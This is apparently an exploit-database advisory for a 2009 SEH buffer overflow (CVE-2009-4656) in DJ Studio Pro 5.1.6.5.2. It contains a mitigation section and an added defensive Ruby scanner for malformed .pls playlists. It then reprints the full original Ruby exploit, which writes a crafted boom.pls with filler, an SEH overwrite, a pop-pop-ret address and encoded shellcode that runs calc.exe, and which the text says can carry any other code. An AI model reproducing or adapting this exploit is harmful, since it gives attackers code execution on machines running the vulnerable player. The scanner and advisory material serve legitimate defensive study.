Vendor: DJ Studio Pro
By: Sébastien Duquette
CVSS: HIGH
Type: SEH Exploit
CWE: 119
Product Name: DJ Studio Pro
Affected Version From: 5.1.6.5.2
Affected Version To: 5.1.6.5.2
Patch Exists: NO
Related CVE: CVE-2009-4656
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2009

DJ Studio Pro 5.1.6.5.2 SEH Exploit

This exploit allows an attacker to execute arbitrary code on a system running DJ Studio Pro version 5.1.6.5.2. The script writes a crafted .pls playlist file (boom.pls); when the vulnerable player opens it, a buffer overflow (CWE-119) overwrites the Structured Exception Handler (SEH) record and lets the attacker redirect the program's execution flow. The included payload launches calc.exe as a proof of concept, but it could be replaced with any other code.

Mitigation:

The vendor should release a patch or update that fixes the buffer overflow in DJ Studio Pro 5.1.6.5.2; none is listed above (Patch Exists: NO). Until one is available, users should avoid opening untrusted playlist or media files and avoid downloading content from untrusted sources to reduce the risk of exploitation.
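Because the trigger is a malformed .pls file, a defender can pre-screen playlists before a vulnerable player touches them. The following Ruby script is an added example, not code from the advisory or from the vendor: it flags playlists whose lines are abnormally long, contain non-text bytes, or break the simple "[playlist]" / key=value layout. The thresholds and the sample playlists are constructed assumptions.

```ruby
# Added example: a defensive pre-screen for .pls playlist files.
# Thresholds are assumptions; real paths and titles stay far below them.
MAX_LINE_LEN = 1024
MAX_FILE_LEN = 1_000_000

# Scan raw playlist bytes; returns an array of finding strings
# (empty when the file looks like an ordinary text playlist).
def scan_pls(data)
  data = data.b                          # inspect bytes, not characters
  findings = []
  findings << "file is #{data.bytesize} bytes" if data.bytesize > MAX_FILE_LEN
  header_seen = false
  data.each_line.with_index(1) do |raw, no|
    line = raw.chomp
    next if line.empty?
    if line.bytesize > MAX_LINE_LEN
      findings << "line #{no}: #{line.bytesize} bytes (limit #{MAX_LINE_LEN})"
    end
    # A playlist is plain text: bytes outside printable ASCII (or TAB)
    # belong to an overflow trigger, not to a song path or title.
    if line.bytes.any? { |b| b != 0x09 && (b < 0x20 || b > 0x7e) }
      findings << "line #{no}: non-text bytes present"
    end
    unless header_seen
      header_seen = true
      findings << "line #{no}: missing [playlist] header" unless line.casecmp?("[playlist]")
      next
    end
    findings << "line #{no}: not key=value" unless line.include?("=")
  end
  findings << "empty file" unless header_seen
  findings
end

def suspicious_pls?(data)
  !scan_pls(data).empty?
end

# Constructed samples (not real files): an ordinary playlist and one
# shaped like an overflow trigger, a long filler run plus non-text bytes.
BENIGN_PLS  = "[playlist]\nFile1=C:\\Music\\song.mp3\nTitle1=Song\n" \
              "Length1=180\nNumberOfEntries=1\nVersion=2\n"
SUSPECT_PLS = "[playlist]\nFile1=" + "A" * 1500 + "\xff\xfe\nTitle1=x\n"

if __FILE__ == $0
  ARGV.each { |path| puts "#{path}: #{scan_pls(File.binread(path)).inspect}" }
end
```

Run it as `ruby scan_pls.rb file.pls` to print the findings for each playlist given on the command line.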

Exploit-DB raw data:

#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date          : 2009-12-30
# Author        : Sébastien Duquette - ekse.0x@gmail.com
# Software Link : http://www.e-soft.co.uk/
# Version       : 5.1.6.5.2
# Tested on     : Windows XP SP2 En
# OSVDB ID      : 58159
# Overflow originally discovered by prodigy

# exec calc.exe
payload = 
"\xda\xdc\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x49\x6c\x48\x68\x4b\x39\x45\x50\x43\x30\x45" +
"\x50\x43\x50\x4d\x59\x48\x65\x46\x51\x4a\x72\x43\x54\x4e" +
"\x6b\x51\x42\x46\x50\x4c\x4b\x50\x52\x44\x4c\x4c\x4b\x51" +
"\x42\x47\x64\x4e\x6b\x44\x32\x51\x38\x46\x6f\x4f\x47\x42" +
"\x6a\x45\x76\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47" +
"\x4c\x45\x31\x51\x6c\x47\x72\x44\x6c\x51\x30\x4a\x61\x48" +
"\x4f\x44\x4d\x47\x71\x48\x47\x49\x72\x4a\x50\x43\x62\x43" +
"\x67\x4e\x6b\x51\x42\x46\x70\x4c\x4b\x51\x52\x45\x6c\x45" +
"\x51\x48\x50\x4c\x4b\x51\x50\x44\x38\x4c\x45\x4f\x30\x44" +
"\x34\x43\x7a\x46\x61\x48\x50\x46\x30\x4c\x4b\x47\x38\x45" +
"\x48\x4e\x6b\x51\x48\x45\x70\x46\x61\x48\x53\x4d\x33\x47" +
"\x4c\x47\x39\x4e\x6b\x47\x44\x4c\x4b\x46\x61\x4b\x66\x44" +
"\x71\x4b\x4f\x45\x61\x4b\x70\x4e\x4c\x4a\x61\x4a\x6f\x46" +
"\x6d\x45\x51\x4f\x37\x44\x78\x4b\x50\x44\x35\x48\x74\x45" +
"\x53\x43\x4d\x4a\x58\x47\x4b\x51\x6d\x47\x54\x51\x65\x49" +
"\x72\x51\x48\x4c\x4b\x46\x38\x51\x34\x47\x71\x48\x53\x51" +
"\x76\x4c\x4b\x46\x6c\x50\x4b\x4c\x4b\x43\x68\x45\x4c\x43" +
"\x31\x4a\x73\x4c\x4b\x44\x44\x4c\x4b\x43\x31\x4e\x30\x4d" +
"\x59\x43\x74\x45\x74\x44\x64\x51\x4b\x43\x6b\x51\x71\x51" +
"\x49\x42\x7a\x46\x31\x49\x6f\x4b\x50\x42\x78\x43\x6f\x51" +
"\x4a\x4e\x6b\x46\x72\x48\x6b\x4f\x76\x51\x4d\x51\x7a\x46" +
"\x61\x4c\x4d\x4b\x35\x48\x39\x47\x70\x45\x50\x45\x50\x42" +
"\x70\x45\x38\x46\x51\x4c\x4b\x50\x6f\x4b\x37\x49\x6f\x49" +
"\x45\x4f\x4b\x48\x70\x4c\x75\x4e\x42\x50\x56\x51\x78\x4f" +
"\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4b\x65\x47\x4c\x44" +
"\x46\x43\x4c\x46\x6a\x4f\x70\x49\x6b\x49\x70\x51\x65\x47" +
"\x75\x4d\x6b\x43\x77\x45\x43\x50\x72\x50\x6f\x42\x4a\x47" +
"\x70\x50\x53\x4b\x4f\x48\x55\x43\x53\x43\x51\x50\x6c\x42" +
"\x43\x44\x6e\x43\x55\x44\x38\x45\x35\x45\x50\x44\x4a\x41" +
"\x41"

# Leftover from development: 'pattern' is never used, and the script
# aborts if pattern_5000.txt is missing, so the line is disabled here.
# pattern = File.open('pattern_5000.txt', 'r').read

f = File.open('boom.pls', 'wb')   # binary mode: no newline translation
f.print 'A' * 1308                # filler up to the SEH record
f.print "\xeb\x06\x90\x90"        # nSEH
f.print "\x2d\xc6\x4f\x01"        # SEH handler: pop-pop-ret @ 0x014FC62D [djstudiopro.exe]
f.print payload                   # calc.exe shellcode
f.print 'A' * 10000               # trailing filler

f.close